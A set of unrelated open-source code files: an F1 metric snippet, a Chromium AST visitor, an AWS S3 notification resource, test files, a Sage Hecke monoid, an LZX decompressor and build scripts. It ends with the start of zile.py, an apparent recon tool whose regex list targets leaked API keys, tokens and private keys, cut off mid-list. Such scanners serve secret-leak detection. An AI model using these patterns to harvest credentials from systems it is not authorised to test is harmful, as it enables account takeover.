elem_f1 = 2 * elem_prec * elem_rec / (elem_prec + elem_rec)
f1_scores.append(elem_f1)
exact_match_f1 = np.mean(f1_scores) * 100
partial_match_f1 = 100 * np.mean(
[sklearn.metrics.f1_score(t, p) for t, p in zip(arrays_t, arrays_p)]
)
def get_avg_num_explanations(explanations):
total_explns = 0
for e in explanations:
total_explns += len(e)
return float(total_explns)/len(explanations) if explanations else 0.0
return {
"accuracy": 100 * sklearn.metrics.accuracy_score(labels_t, labels_p),
"f1": exact_match_f1,
"partial match f1": partial_match_f1,
"avg_explanation_count": get_avg_num_explanations(explns_p),
}
|
ppapi/generators/idl_visitor.py | zealoussnow/chromium | 14,668 | 11178394 | # Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
""" Visitor Object for traversing AST """
#
# IDLVisitor
#
# The IDLVisitor class will traverse an AST truncating portions of the tree
# when 'VisitFilter' returns false. After the filter returns true, for each
# node, the visitor will call the 'Arrive' member passing in the node and
# a generic data object from the parent call. The returned value is then
# passed to all children, whose results are aggregated into a list. The child
# results along with the original Arrive result are passed to the Depart
# function which returns the final result of the Visit. By default this is
# the exact value that was returned from the original Arrive.
#
class IDLVisitor(object):
def __init__(self):
pass
# Return TRUE if the node should be visited
def VisitFilter(self, node, data):
return True
def Visit(self, node, data):
if not self.VisitFilter(node, data): return None
childdata = []
newdata = self.Arrive(node, data)
for child in node.GetChildren():
ret = self.Visit(child, newdata)
if ret is not None:
childdata.append(ret)
return self.Depart(node, newdata, childdata)
def Arrive(self, node, data):
__pychecker__ = 'unusednames=node'
return data
def Depart(self, node, data, childdata):
__pychecker__ = 'unusednames=node,childdata'
return data
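#
# Illustrative sketch (not part of the original generator): a minimal visitor
# that tallies node class names while traversing, relying only on the
# GetChildren() protocol used by Visit above. The class name is hypothetical.
#
class NodeTallyVisitor(IDLVisitor):
  def Arrive(self, node, data):
    # Accumulate a per-class-name count in the shared data dict.
    data[node.__class__.__name__] = data.get(node.__class__.__name__, 0) + 1
    return data
# Usage sketch: tally = NodeTallyVisitor().Visit(ast_root, {})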
|
gordon/resources/s3.py | patgoley/gordon | 2,204 | 11178395 | import re
from collections import defaultdict, Counter
import six
import troposphere
from troposphere import sqs, sns, awslambda
from . import base
from gordon import exceptions
from gordon import utils
from gordon.actions import Ref
from gordon.contrib.s3.resources import (
S3BucketNotificationConfiguration,
NotificationConfiguration, KeyFilter
)
class BaseNotification(object):
def __init__(self, bucket_notification_configuration, **kwargs):
self.settings = kwargs
self.bucket_notification_configuration = bucket_notification_configuration
self.events = []
        # Validate all notifications have an id. This is important because
        # we'll rely on this id to create/modify/delete notifications.
if 'id' in self.settings:
self.id = self.settings['id']
else:
raise exceptions.ResourceValidationError(
(
"You need to define an id which identifies the "
"notification {}").format(self.settings)
)
# Validate that events is present, and that it contains valid values
if 'events' in self.settings and self.settings['events']:
for event in self.settings['events']:
event_match = re.match(r's3\:(\w+|\*)(?:\:(\w+|\*))?', event)
if event_match:
self.events.append([event] + list(event_match.groups()))
else:
raise exceptions.ResourceValidationError(
"Invalid event {}".format(event)
)
else:
raise exceptions.ResourceValidationError(
("You need to define a list of events for the "
"notification {}").format(self.name)
)
# Validate that filters are a subset of (prefix, suffix) and keys
# are not duplicated.
_filters = self.settings.get('key_filters', {})
        if not set(_filters) <= set(('prefix', 'suffix')):
raise exceptions.ResourceValidationError(
"""You can't create filters for '{}'.""".format(
', '.join(_filters)
)
)
else:
self.filters = [(k, v) for k, v in six.iteritems(_filters)]
@classmethod
def from_dict(cls, data, id, bucket_notification_configuration):
notification_type = set(('lambda', 'topic', 'queue')) & set(data.keys())
if len(notification_type) != 1:
raise exceptions.ResourceValidationError(
(
"You need to define either a lamda, a queue or a topic "
"as destination of your notification {}"
).format(bucket_notification_configuration)
)
return {'lambda': LambdaFunctionNotification,
'queue': QueueNotification,
'topic': TopicNotification}.get(
list(notification_type)[0])(
id=id,
bucket_notification_configuration=bucket_notification_configuration,
**data
)
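    # Illustrative settings sketch (hypothetical values) for the data dict
    # consumed by from_dict: exactly one destination key ('lambda', 'queue'
    # or 'topic') plus events and optional key filters.
    #
    #   {'lambda': 'app.myfunction',
    #    'events': ['s3:ObjectCreated:*'],
    #    'key_filters': {'prefix': 'media/'}}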
def get_destination_arn(self):
pass
def register_destination_publish_permission(self, template):
pass
class LambdaFunctionNotification(BaseNotification):
api_property = 'LambdaFunctionConfigurations'
def register_destination_publish_permission(self, template):
template.add_resource(
awslambda.Permission(
utils.valid_cloudformation_name(
self.bucket_notification_configuration.name,
self.id,
'permission'
),
Action="lambda:InvokeFunction",
FunctionName=self.get_destination_arn(),
Principal="s3.amazonaws.com",
SourceAccount=troposphere.Ref(troposphere.AWS_ACCOUNT_ID),
SourceArn=self.bucket_notification_configuration.get_bucket_arn()
)
)
def get_destination_arn(self):
return troposphere.Ref(
self.bucket_notification_configuration.project.reference(
utils.lambda_friendly_name_to_grn(
self.settings['lambda']
)
)
)
class QueueNotification(BaseNotification):
api_property = 'QueueConfigurations'
def get_destination_arn(self):
destination = self.settings['queue']
region = troposphere.Ref(troposphere.AWS_REGION)
if isinstance(destination, six.string_types):
if destination.startswith('arn:aws:'):
return destination
account = troposphere.Ref(troposphere.AWS_ACCOUNT_ID)
elif isinstance(destination, dict):
account = destination['account_id']
destination = destination['name']
else:
return destination
return troposphere.Join(":", [
"arn:aws:sqs",
region,
account,
destination
])
def get_destination_url(self):
destination = self.settings['queue']
region = troposphere.Ref(troposphere.AWS_REGION)
if isinstance(destination, six.string_types):
account = troposphere.Ref(troposphere.AWS_ACCOUNT_ID)
elif isinstance(destination, dict):
account = destination['account_id']
destination = destination['name']
else:
return destination
return troposphere.Join("", [
"https://sqs.",
region,
".amazonaws.com/",
account,
"/",
destination
])
def register_destination_publish_permission(self, template):
template.add_resource(
sqs.QueuePolicy(
utils.valid_cloudformation_name(
self.bucket_notification_configuration.name,
self.id,
'permission'
),
Queues=[self.get_destination_url()],
PolicyDocument={
"Version": "2008-10-17",
"Id": "PublicationPolicy",
"Statement": [{
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": ["sqs:SendMessage"],
"Resource": self.get_destination_arn(),
"Condition": {
"ArnEquals": {"aws:SourceArn": self.bucket_notification_configuration.get_bucket_arn()}
}
}]
}
)
)
class TopicNotification(BaseNotification):
api_property = 'TopicConfigurations'
def get_destination_arn(self):
destination = self.settings['topic']
region = troposphere.Ref(troposphere.AWS_REGION)
if isinstance(destination, six.string_types):
if destination.startswith('arn:aws:'):
return destination
account = troposphere.Ref(troposphere.AWS_ACCOUNT_ID)
elif isinstance(destination, dict):
account = destination['account_id']
destination = destination['name']
else:
return destination
return troposphere.Join(":", [
"arn:aws:sns",
region,
account,
destination
])
def register_destination_publish_permission(self, template):
template.add_resource(
sns.TopicPolicy(
utils.valid_cloudformation_name(
self.bucket_notification_configuration.name,
self.id,
'permission'
),
Topics=[self.get_destination_arn()],
PolicyDocument={
"Version": "2008-10-17",
"Id": "PublicationPolicy",
"Statement": [{
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": ["sns:Publish"],
"Resource": self.get_destination_arn(),
"Condition": {
"ArnEquals": {"aws:SourceArn": self.bucket_notification_configuration.get_bucket_arn()}
}
}]
}
)
)
class BucketNotificationConfiguration(base.BaseResource):
grn_type = 's3-bucket-notification'
required_settings = (
'bucket',
'notifications',
)
def __init__(self, *args, **kwargs):
super(BucketNotificationConfiguration, self).__init__(*args, **kwargs)
self._notifications = {}
for notification_id, notification_data in six.iteritems(self.settings.get('notifications', {})):
self._notifications[notification_id] = BaseNotification.from_dict(
id=notification_id,
data=notification_data,
bucket_notification_configuration=self
)
self._validate_notifications()
def get_bucket_arn(self):
bucket_name = self.get_bucket_name()
return troposphere.Join("", ["arn:aws:s3:::", bucket_name])
def get_bucket_name(self):
bucket = self.settings.get('bucket')
if isinstance(bucket, troposphere.Ref):
return bucket
return bucket
def _validate_notifications(self):
# Validate that all key prefix/suffix filters for a bucket
        # don't overlap one another.
all_filters = defaultdict(list)
for notification_id, notification in six.iteritems(self._notifications):
for name, value in notification.filters:
all_filters[name].append(value)
overlap_checks = {'prefix': 'startswith', 'suffix': 'endswith'}
for filter_type, values in six.iteritems(all_filters):
            check = overlap_checks.get(filter_type)
            # Skip filter values that are Ref instances
            # since Refs aren't bound until apply
            values = [v for v in values if not isinstance(v, Ref)]
overlaps = [sum([int(getattr(v, check)(z)) for z in values]) for v in values]
if sum(overlaps) > len(values):
raise exceptions.ResourceValidationError(
"One or more {} filters overlap one to each other {}.".format(
filter_type,
', '.join(values)
)
)
def register_resources_template(self, template):
extra = defaultdict(list)
for notification_id, notification in six.iteritems(self._notifications):
notification.register_destination_publish_permission(template)
extra[notification.api_property].append(
NotificationConfiguration(
Id=troposphere.Join('-', ['gordon', notification.id]),
DestinationArn=notification.get_destination_arn(),
Events=[e for e, _, _ in notification.events],
KeyFilters=[KeyFilter(Name=name, Value=value) for name, value in notification.filters]
)
)
bucket_notification_configuration_lambda = 'lambda:contrib_s3:bucket_notification_configuration:current'
template.add_resource(
S3BucketNotificationConfiguration.create_with(
utils.valid_cloudformation_name(self.name),
DependsOn=[self.project.reference(bucket_notification_configuration_lambda)],
lambda_arn=troposphere.Ref(self.project.reference(bucket_notification_configuration_lambda)),
Bucket=self.get_bucket_name(),
**dict([[k, v] for k, v in six.iteritems(extra) if v])
)
)
def validate(self):
"""Validate that there are no any other resources in the project which
try to register notifications for the same bucket than this resource"""
for resource in \
(r for r in self.project.get_resources() if isinstance(r, self.__class__) and r.bucket == self.bucket):
raise exceptions.ResourceValidationError(
("Both resources '{}' and '{}', registers notifications for "
"the bucket '{}'. Because AWS API limitations we need you to "
"register all notifications of one bucket in the same "
"resource.").format(self, resource, self.bucket)
)
|
tests/test_overrides.py | alexmusa/adt | 153 | 11178422 |
import unittest
from adt import Case, adt
from tests import helpers
from typing import Callable, Optional, TypeVar
_T = TypeVar('_T')
def optionality(x: _T) -> Optional[_T]:
return x
@adt
class OverriddenAccessors:
INTVALUE: Case[int]
STRVALUE: Case[str]
@property
def intvalue(self) -> Optional[int]:
return self.match(intvalue=lambda x: optionality(x),
strvalue=lambda _: None)
@property
def strvalue(self) -> Optional[str]:
return self.match(intvalue=lambda _: None,
strvalue=lambda x: optionality(x))
@adt
class OverriddenMatch:
INTVALUE: Case[int]
STRVALUE: Case[str]
def match(self, intvalue: Callable[[int], str],
strvalue: Callable[[str], str]) -> str:
try:
x = self.intvalue()
except:
return strvalue(self.strvalue())
return intvalue(x)
class TestOverrides(unittest.TestCase):
def test_overriddenAccessorIntvalue(self) -> None:
x = OverriddenAccessors.INTVALUE(5)
self.assertEqual(x.intvalue, 5)
self.assertIsNone(x.strvalue)
self.assertEqual(
x.match(intvalue=lambda x: x,
strvalue=helpers.invalidPatternMatch), 5)
def test_overriddenAccessorStrvalue(self) -> None:
x = OverriddenAccessors.STRVALUE("foobar")
self.assertIsNone(x.intvalue)
self.assertEqual(x.strvalue, "foobar")
self.assertEqual(
x.match(intvalue=helpers.invalidPatternMatch,
strvalue=lambda x: x), "foobar")
def test_overriddenMatchIntvalue(self) -> None:
x = OverriddenMatch.INTVALUE(5)
self.assertEqual(x.intvalue(), 5)
self.assertEqual(
x.match(intvalue=lambda x: str(x),
strvalue=helpers.invalidPatternMatch), "5")
def test_overriddenMatchStrvalue(self) -> None:
x = OverriddenMatch.STRVALUE("foobar")
self.assertEqual(x.strvalue(), "foobar")
self.assertEqual(
x.match(intvalue=helpers.invalidPatternMatch,
strvalue=lambda x: x), "foobar") |
src/sage/monoids/hecke_monoid.py | bopopescu/sage | 1,742 | 11178524 |
# -*- coding: utf-8 -*-
"""
Hecke Monoids
"""
#*****************************************************************************
# Copyright (C) 2015 <NAME> <nthiery at users.sf.net>
#
# Distributed under the terms of the GNU General Public License (GPL)
# http://www.gnu.org/licenses/
#*****************************************************************************
from sage.misc.cachefunc import cached_function
from sage.sets.finite_set_maps import FiniteSetMaps
@cached_function
def HeckeMonoid(W):
r"""
Return the `0`-Hecke monoid of the Coxeter group `W`.
INPUT:
- `W` -- a finite Coxeter group
Let `s_1,\ldots,s_n` be the simple reflections of `W`. The 0-Hecke
monoid is the monoid generated by projections `\pi_1,\ldots,\pi_n`
satisfying the same braid and commutation relations as the `s_i`.
    It has the same cardinality as `W`.
.. NOTE::
This is currently a very basic implementation as the submonoid
of sorting maps on `W` generated by the simple projections of
`W`. It's only functional for `W` finite.
.. SEEALSO::
- :class:`CoxeterGroups`
- :class:`CoxeterGroups.ParentMethods.simple_projections`
- :class:`IwahoriHeckeAlgebra`
EXAMPLES::
sage: from sage.monoids.hecke_monoid import HeckeMonoid
sage: W = SymmetricGroup(4)
sage: H = HeckeMonoid(W); H
0-Hecke monoid of the Symmetric group of order 4! as a permutation group
sage: pi = H.monoid_generators(); pi
Finite family {1: ..., 2: ..., 3: ...}
sage: all(pi[i]^2 == pi[i] for i in pi.keys())
True
sage: pi[1] * pi[2] * pi[1] == pi[2] * pi[1] * pi[2]
True
sage: pi[2] * pi[3] * pi[2] == pi[3] * pi[2] * pi[3]
True
sage: pi[1] * pi[3] == pi[3] * pi[1]
True
sage: H.cardinality()
24
"""
ambient_monoid = FiniteSetMaps(W, action="right")
pi = W.simple_projections(length_increasing=True).map(ambient_monoid)
H = ambient_monoid.submonoid(pi)
H.rename("0-Hecke monoid of the %s"%W)
return H
|
lib/hachoir/parser/archive/lzx.py | 0x20Man/Watcher3 | 320 | 11178525 | """LZX data stream parser.
Also includes a decompression function (slow!!) which can decompress
LZX data stored in a Hachoir stream.
Author: <NAME>
Creation date: July 18, 2007
"""
from hachoir.parser import Parser
from hachoir.field import (FieldSet,
UInt32, Bit, Bits, PaddingBits,
RawBytes, ParserError)
from hachoir.core.endian import MIDDLE_ENDIAN, LITTLE_ENDIAN
from hachoir.core.tools import paddingSize
from hachoir.parser.archive.zlib import build_tree, HuffmanCode, extend_data
class LZXPreTreeEncodedTree(FieldSet):
def __init__(self, parent, name, num_elements, *args, **kwargs):
FieldSet.__init__(self, parent, name, *args, **kwargs)
self.num_elements = num_elements
def createFields(self):
for i in range(20):
yield Bits(self, "pretree_lengths[]", 4)
pre_tree = build_tree(
[self['pretree_lengths[%d]' % x].value for x in range(20)])
if not hasattr(self.root, "lzx_tree_lengths_" + self.name):
self.lengths = [0] * self.num_elements
setattr(self.root, "lzx_tree_lengths_" + self.name, self.lengths)
else:
self.lengths = getattr(self.root, "lzx_tree_lengths_" + self.name)
i = 0
while i < self.num_elements:
field = HuffmanCode(self, "tree_code[]", pre_tree)
if field.realvalue <= 16:
self.lengths[i] = (self.lengths[i] - field.realvalue) % 17
field._description = "Literal tree delta length %i (new length value %i for element %i)" % (
field.realvalue, self.lengths[i], i)
i += 1
yield field
elif field.realvalue == 17:
field._description = "Tree Code 17: Zeros for 4-19 elements"
yield field
extra = Bits(self, "extra[]", 4)
zeros = 4 + extra.value
extra._description = "Extra bits: zeros for %i elements (elements %i through %i)" % (
zeros, i, i + zeros - 1)
yield extra
self.lengths[i:i + zeros] = [0] * zeros
i += zeros
elif field.realvalue == 18:
field._description = "Tree Code 18: Zeros for 20-51 elements"
yield field
extra = Bits(self, "extra[]", 5)
zeros = 20 + extra.value
extra._description = "Extra bits: zeros for %i elements (elements %i through %i)" % (
zeros, i, i + zeros - 1)
yield extra
self.lengths[i:i + zeros] = [0] * zeros
i += zeros
elif field.realvalue == 19:
field._description = "Tree Code 19: Same code for 4-5 elements"
yield field
extra = Bits(self, "extra[]", 1)
run = 4 + extra.value
extra._description = "Extra bits: run for %i elements (elements %i through %i)" % (
run, i, i + run - 1)
yield extra
newfield = HuffmanCode(self, "tree_code[]", pre_tree)
assert newfield.realvalue <= 16
newfield._description = "Literal tree delta length %i (new length value %i for elements %i through %i)" % (
newfield.realvalue, self.lengths[i], i, i + run - 1)
self.lengths[
i:i + run] = [(self.lengths[i] - newfield.realvalue) % 17] * run
i += run
yield newfield
class LZXBlock(FieldSet):
WINDOW_SIZE = {15: 30,
16: 32,
17: 34,
18: 36,
19: 38,
20: 42,
21: 50}
POSITION_SLOTS = {0: (0, 0, 0),
1: (1, 1, 0),
2: (2, 2, 0),
3: (3, 3, 0),
4: (4, 5, 1),
5: (6, 7, 1),
6: (8, 11, 2),
7: (12, 15, 2),
8: (16, 23, 3),
9: (24, 31, 3),
10: (32, 47, 4),
11: (48, 63, 4),
12: (64, 95, 5),
13: (96, 127, 5),
14: (128, 191, 6),
15: (192, 255, 6),
16: (256, 383, 7),
17: (384, 511, 7),
18: (512, 767, 8),
19: (768, 1023, 8),
20: (1024, 1535, 9),
21: (1536, 2047, 9),
22: (2048, 3071, 10),
23: (3072, 4095, 10),
24: (4096, 6143, 11),
25: (6144, 8191, 11),
26: (8192, 12287, 12),
27: (12288, 16383, 12),
28: (16384, 24575, 13),
29: (24576, 32767, 13),
30: (32768, 49151, 14),
31: (49152, 65535, 14),
32: (65536, 98303, 15),
33: (98304, 131071, 15),
34: (131072, 196607, 16),
35: (196608, 262143, 16),
36: (262144, 393215, 17),
37: (393216, 524287, 17),
38: (524288, 655359, 17),
39: (655360, 786431, 17),
40: (786432, 917503, 17),
41: (917504, 1048575, 17),
42: (1048576, 1179647, 17),
43: (1179648, 1310719, 17),
44: (1310720, 1441791, 17),
45: (1441792, 1572863, 17),
46: (1572864, 1703935, 17),
47: (1703936, 1835007, 17),
48: (1835008, 1966079, 17),
49: (1966080, 2097151, 17),
}
def createFields(self):
yield Bits(self, "block_type", 3)
yield Bits(self, "block_size", 24)
self.uncompressed_size = self["block_size"].value
self.compression_level = self.root.compr_level
self.window_size = self.WINDOW_SIZE[self.compression_level]
self.block_type = self["block_type"].value
curlen = len(self.parent.uncompressed_data)
if self.block_type in (1, 2): # Verbatim or aligned offset block
if self.block_type == 2:
for i in range(8):
yield Bits(self, "aligned_len[]", 3)
aligned_tree = build_tree(
[self['aligned_len[%d]' % i].value for i in range(8)])
yield LZXPreTreeEncodedTree(self, "main_tree_start", 256)
yield LZXPreTreeEncodedTree(self, "main_tree_rest", self.window_size * 8)
main_tree = build_tree(
self["main_tree_start"].lengths + self["main_tree_rest"].lengths)
yield LZXPreTreeEncodedTree(self, "length_tree", 249)
length_tree = build_tree(self["length_tree"].lengths)
current_decoded_size = 0
while current_decoded_size < self.uncompressed_size:
if (curlen + current_decoded_size) % 32768 == 0 and (curlen + current_decoded_size) != 0:
padding = paddingSize(self.address + self.current_size, 16)
if padding:
yield PaddingBits(self, "padding[]", padding)
field = HuffmanCode(self, "main_code[]", main_tree)
if field.realvalue < 256:
field._description = "Literal value %r" % chr(
field.realvalue)
current_decoded_size += 1
self.parent.uncompressed_data += chr(field.realvalue)
yield field
continue
position_header, length_header = divmod(
field.realvalue - 256, 8)
info = self.POSITION_SLOTS[position_header]
if info[2] == 0:
if info[0] == 0:
position = self.parent.r0
field._description = "Position Slot %i, Position [R0] (%i)" % (
position_header, position)
elif info[0] == 1:
position = self.parent.r1
self.parent.r1 = self.parent.r0
self.parent.r0 = position
field._description = "Position Slot %i, Position [R1] (%i)" % (
position_header, position)
elif info[0] == 2:
position = self.parent.r2
self.parent.r2 = self.parent.r0
self.parent.r0 = position
field._description = "Position Slot %i, Position [R2] (%i)" % (
position_header, position)
else:
position = info[0] - 2
self.parent.r2 = self.parent.r1
self.parent.r1 = self.parent.r0
self.parent.r0 = position
field._description = "Position Slot %i, Position %i" % (
position_header, position)
else:
field._description = "Position Slot %i, Positions %i to %i" % (
position_header, info[0] - 2, info[1] - 2)
if length_header == 7:
field._description += ", Length Values 9 and up"
yield field
length_field = HuffmanCode(
self, "length_code[]", length_tree)
length = length_field.realvalue + 9
length_field._description = "Length Code %i, total length %i" % (
length_field.realvalue, length)
yield length_field
else:
field._description += ", Length Value %i (Huffman Code %i)" % (
length_header + 2, field.value)
yield field
length = length_header + 2
if info[2]:
if self.block_type == 1 or info[2] < 3: # verbatim
extrafield = Bits(
self, "position_extra[%s" % field.name.split('[')[1], info[2])
position = extrafield.value + info[0] - 2
extrafield._description = "Position Extra Bits (%i), total position %i" % (
extrafield.value, position)
yield extrafield
else: # aligned offset
position = info[0] - 2
if info[2] > 3:
extrafield = Bits(
self, "position_verbatim[%s" % field.name.split('[')[1], info[2] - 3)
position += extrafield.value * 8
extrafield._description = "Position Verbatim Bits (%i), added position %i" % (
extrafield.value, extrafield.value * 8)
yield extrafield
if info[2] >= 3:
extrafield = HuffmanCode(
self, "position_aligned[%s" % field.name.split('[')[1], aligned_tree)
position += extrafield.realvalue
extrafield._description = "Position Aligned Bits (%i), total position %i" % (
extrafield.realvalue, position)
yield extrafield
self.parent.r2 = self.parent.r1
self.parent.r1 = self.parent.r0
self.parent.r0 = position
self.parent.uncompressed_data = extend_data(
self.parent.uncompressed_data, length, position)
current_decoded_size += length
elif self.block_type == 3: # Uncompressed block
padding = paddingSize(self.address + self.current_size, 16)
if padding:
yield PaddingBits(self, "padding[]", padding)
else:
yield PaddingBits(self, "padding[]", 16)
self.endian = LITTLE_ENDIAN
yield UInt32(self, "r[]", "New value of R0")
yield UInt32(self, "r[]", "New value of R1")
yield UInt32(self, "r[]", "New value of R2")
self.parent.r0 = self["r[0]"].value
self.parent.r1 = self["r[1]"].value
self.parent.r2 = self["r[2]"].value
yield RawBytes(self, "data", self.uncompressed_size)
self.parent.uncompressed_data += self["data"].value
if self["block_size"].value % 2:
yield PaddingBits(self, "padding", 8)
else:
raise ParserError("Unknown block type %d!" % self.block_type)
class LZXStream(Parser):
endian = MIDDLE_ENDIAN
def createFields(self):
self.uncompressed_data = ""
self.r0 = 1
self.r1 = 1
self.r2 = 1
yield Bit(self, "filesize_indicator")
if self["filesize_indicator"].value:
yield UInt32(self, "filesize")
while self.current_size < self.size:
block = LZXBlock(self, "block[]")
yield block
if self.size - self.current_size < 16:
padding = paddingSize(self.address + self.current_size, 16)
if padding:
yield PaddingBits(self, "padding[]", padding)
break
def lzx_decompress(stream, window_bits):
data = LZXStream(stream)
data.compr_level = window_bits
for unused in data:
pass
return data.uncompressed_data
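# Hedged usage sketch: lzx_decompress drives the parser once, purely for the
# side effect of accumulating uncompressed_data. The stream wrapper below
# assumes hachoir's StringInputStream; "chunk.lzx" and window_bits=16 are
# illustrative values, not fixed by this module.
#
#   from hachoir_core.stream import StringInputStream
#   raw = open("chunk.lzx", "rb").read()
#   plain = lzx_decompress(StringInputStream(raw), window_bits=16)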
|
Unix/scriptext/py/setup.py | Beguiled/omi | 165 | 11178557 | <filename>Unix/scriptext/py/setup.py<gh_stars>100-1000
import os
from distutils.core import setup, Extension
# hardcoded directory; needs to be updated
dirs = "/tmp/omi-latest"
setup(name='PMI_Instance',version = '1.0', ext_modules = [Extension('mi.PMI_Instance',sources=['PMI_Instance.c'],extra_compile_args=['-O0'],runtime_library_dirs=[dirs+'/output/lib/'],
library_dirs=[dirs+'/output/lib/'],
libraries=['mi'],
include_dirs=[dirs+'/output/include'])])
setup(name='PMI_Class',version = '1.0', ext_modules = [Extension('mi.PMI_Class',sources=['PMI_Class.c'],extra_compile_args=['-O0'],runtime_library_dirs=[dirs+'/output/lib/'],
library_dirs=[dirs+'/output/lib/'],
libraries=['mi'],
include_dirs=[dirs+'/output/include'])])
setup(name='PMI_Session',version = '1.0', ext_modules = [Extension('mi.PMI_Session',sources=['PMI_Session.c'],extra_compile_args=['-O0'],runtime_library_dirs=[dirs+'/output/lib/'],
library_dirs=[dirs+'/output/lib/'],
libraries=['mi'],
include_dirs=[dirs+'/output/include'])])
setup(name='mi', version='1.0',
ext_modules=[Extension('mi',
sources=['PythonBinding.c'],
extra_compile_args=['-O0'],
runtime_library_dirs=[dirs+'/output/lib/'],
library_dirs=[dirs+'/output/lib/'],
libraries=['mi'],
include_dirs=[dirs+'/output/include']
)])
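# Standard distutils invocation for this script (the hardcoded `dirs` path
# above must point at a built OMI tree before building):
#   python setup.py build
#   python setup.py install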
|
tests/components/sensibo/__init__.py | MrDelik/core | 22,481 | 11178558 | <reponame>MrDelik/core
"""Tests for the Sensibo integration."""
|
PhysicsTools/PatExamples/python/JetEnergyShift_cfi.py | ckamtsikis/cmssw | 852 | 11178574 | import FWCore.ParameterSet.Config as cms
scaledJets = cms.EDProducer("JetEnergyShift",
inputJets = cms.InputTag("cleanPatJets"),
inputMETs = cms.InputTag("patMETs"),
scaleFactor = cms.double(1.0),
jetPTThresholdForMET = cms.double(20.),
jetEMLimitForMET = cms.double(0.9)
)
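# Hedged usage note: energy-shift variants are typically made by cloning the
# producer with a different scaleFactor (the variant names are illustrative):
#   scaledJetsEnUp   = scaledJets.clone(scaleFactor = 1.02)
#   scaledJetsEnDown = scaledJets.clone(scaleFactor = 0.98)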
|
tablib/packages/xlwt/examples/hyperlinks.py | rhunwicks/tablib | 372 | 11178577 | #!/usr/bin/env python
# -*- coding: windows-1251 -*-
# Copyright (C) 2005 <NAME>
from xlwt import *
f = Font()
f.height = 20*72  # xlwt font height is in 1/20 of a point, so this is 72 pt
f.name = 'Verdana'
f.bold = True
f.underline = Font.UNDERLINE_DOUBLE
f.colour_index = 4
h_style = XFStyle()
h_style.font = f
w = Workbook()
ws = w.add_sheet('F')
##############
## NOTE: parameters are separated by semicolon!!!
##############
n = "HYPERLINK"
ws.write_merge(1, 1, 1, 10, Formula(n + '("http://www.irs.gov/pub/irs-pdf/f1000.pdf";"f1000.pdf")'), h_style)
ws.write_merge(2, 2, 2, 25, Formula(n + '("mailto:<EMAIL>?subject=pyExcelerator-feedback&Body=Hello,%20Roman!";"pyExcelerator-feedback")'), h_style)
w.save("hyperlinks.xls")
|
scripts/zile/zile.py | upenderadepu/crimson | 108 | 11178588 | # github.com/xyele
import os,sys,re,requests,random
from termcolor import colored
from concurrent.futures import ThreadPoolExecutor
from requests.packages.urllib3.exceptions import InsecureRequestWarning
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
# Base Variables
colors = ["red","green","yellow","blue","magenta","cyan","white"]
settings = {
"threads":10,
"requestTimeout":7,
"requestUA":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36"
}
patterns = {
"slack_token": <KEY>
"slack_webhook": "https://hooks.slack.com/services/T[a-zA-Z0-9_]{8}/B[a-zA-Z0-9_]{8}/[a-zA-Z0-9_]{24}",
"facebook_oauth": "[f|F][a|A][c|C][e|E][b|B][o|O][o|O][k|K].{0,30}['\"\\s][0-9a-f]{32}['\"\\s]",
"twitter_oauth": "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]",
"twitter_access_token": "[t|T][w|W][i|I][t|T][t|T][e|E][r|R].*[1-9][0-9]+-[0-9a-zA-Z]{40}",
"heroku_api": "[h|H][e|E][r|R][o|O][k|K][u|U].{0,30}[0-9A-F]{8}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{4}-[0-9A-F]{12}",
"mailgun_api": "key-[0-9a-zA-Z]{32}",
"mailchamp_api": "[0-9a-f]{32}-us[0-9]{1,2}",
"picatic_api": "sk_live_[0-9a-z]{32}",
"google_oauth_id": "[0-9(+-[0-9A-Za-z_]{32}.apps.googleusercontent.com",
"google_api": "AIza[0-9A-Za-z-_]{35}",
"google_captcha": "6L[0-9A-Za-z-_]{38}",
"google_oauth": "ya29\\.[0-9A-Za-z\\-_]+",
"amazon_aws_access_key_id": "<KEY>
"amazon_mws_auth_token": "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}",
"amazonaws_url": "s3\\.amazonaws.com[/]+|[a-zA-Z0-9_-]*\\.s3\\.amazonaws.com",
"facebook_access_token": "EAACEdEose0cBA[0-9A-Za-z]+",
"mailgun_api_key": "key-[0-9a-zA-Z]{32}",
"twilio_api_key": "SK[0-9a-fA-F]{32}",
"twilio_account_sid": "AC[a-zA-Z0-9_\\-]{32}",
"twilio_app_sid": "AP[a-zA-Z0-9_\\-]{32}",
"paypal_braintree_access_token": "access_token\\$production\\$[0-9a-z]{16}\\$[0-9a-f]{32}",
"square_oauth_secret": "sq0csp-[ 0-9A-Za-z\\-_]{43}",
"square_access_token": "sqOatp-[0-9A-Za-z\\-_]{22}",
"stripe_standard_api": "sk_live_[0-9a-zA-Z]{24}",
"stripe_restricted_api": "rk_live_[0-9a-zA-Z]{24}",
"github_access_token": "[a-zA-Z0-9_-]*:[a-zA-Z0-9_\\-]+@github\\.com*",
"private_ssh_key": "-----BEGIN PRIVATE KEY-----[a-zA-Z0-9\\S]{100,}-----END PRIVATE KEY-----",
"private_rsa_key": "-----BEGIN RSA PRIVATE KEY-----[a-zA-Z0-9\\S]{100,}-----END RSA PRIVATE KEY-----",
"gpg_private_key_block": "-----BEGIN PGP PRIVATE KEY BLOCK-----",
"generic_api_key": "[a|A][p|P][i|I][_]?[k|K][e|E][y|Y].*['|\"][0-9a-zA-Z]{32,45}['|\"]",
"generic_secret": "[s|S][e|E][c|C][r|R][e|E][t|T].*['|\"][0-9a-zA-Z]{32,45}['|\"]",
"ip_address": "(([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])\\.){3}([0-9]|[1-9][0-9]|1[0-9]{2}|2[0-4][0-9]|25[0-5])",
